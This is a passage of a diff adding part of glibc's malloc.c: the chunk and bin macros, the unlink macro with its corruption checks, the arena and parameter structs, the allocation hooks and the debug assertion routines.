+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/*  Same, except also perform argument check */
+
+#define checked_request2size(req, sz)                             \
+  if (REQUEST_OUT_OF_RANGE (req)) {					      \
+      __set_errno (ENOMEM);						      \
+      return 0;								      \
+    }									      \
+  (sz) = request2size (req);
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceeded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
+      malloc_printerr (check_action, "corrupted size vs. prev_size", P, AV);  \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (chunksize_nomask (P))			      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr (check_action,				      \
+			       "corrupted double-linked list (not small)",    \
+			       P, AV);					      \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   Since the lowest 2 bits in max_fast don't matter in size comparisons,
+   they are used as flags.
+ */
+
+/*
+   FASTCHUNKS_BIT held in max_fast indicates that there are probably
+   some fastbin chunks. It is set true on entering a chunk into any
+   fastbin, and cleared only in malloc_consolidate.
+
+   The truth value is inverted so that have_fastchunks will be true
+   upon startup (since statics are zero-filled), simplifying
+   initialization checks.
+ */
+
+#define FASTCHUNKS_BIT        (1U)
+
+#define have_fastchunks(M)     (((M)->flags & FASTCHUNKS_BIT) == 0)
+#define clear_fastchunks(M)    catomic_or (&(M)->flags, FASTCHUNKS_BIT)
+#define set_fastchunks(M)      catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* ARENA_CORRUPTION_BIT is set if a memory corruption was detected on the
+   arena.  Such an arena is no longer used to allocate chunks.  Chunks
+   allocated in that arena before detecting corruption are not freed.  */
+
+#define ARENA_CORRUPTION_BIT (4U)
+
+#define arena_is_corrupt(A)	(((A)->flags & ARENA_CORRUPTION_BIT))
+#define set_arena_corrupt(A)	((A)->flags |= ARENA_CORRUPTION_BIT)
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks.
+   Setting the value clears fastchunk bit but preserves noncontiguous bit.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+#define get_max_fast() global_max_fast
+
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunked are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called only from within malloc_consolidate, which needs
+   be called in the same contexts anyway.  It is never called directly
+   outside of malloc_consolidate because some optimizing compilers try
+   to inline it at all call points, which turns out not to be an
+   optimization at all. (Inlining it in malloc_consolidate is fine though.)
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  av->flags |= FASTCHUNKS_BIT;
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+
+/* ---------------- Error behavior ------------------------------------ */
+
+#ifndef DEFAULT_CHECK_ACTION
+# define DEFAULT_CHECK_ACTION 3
+#endif
+
+static int check_action = DEFAULT_CHECK_ACTION;
+
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (p) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
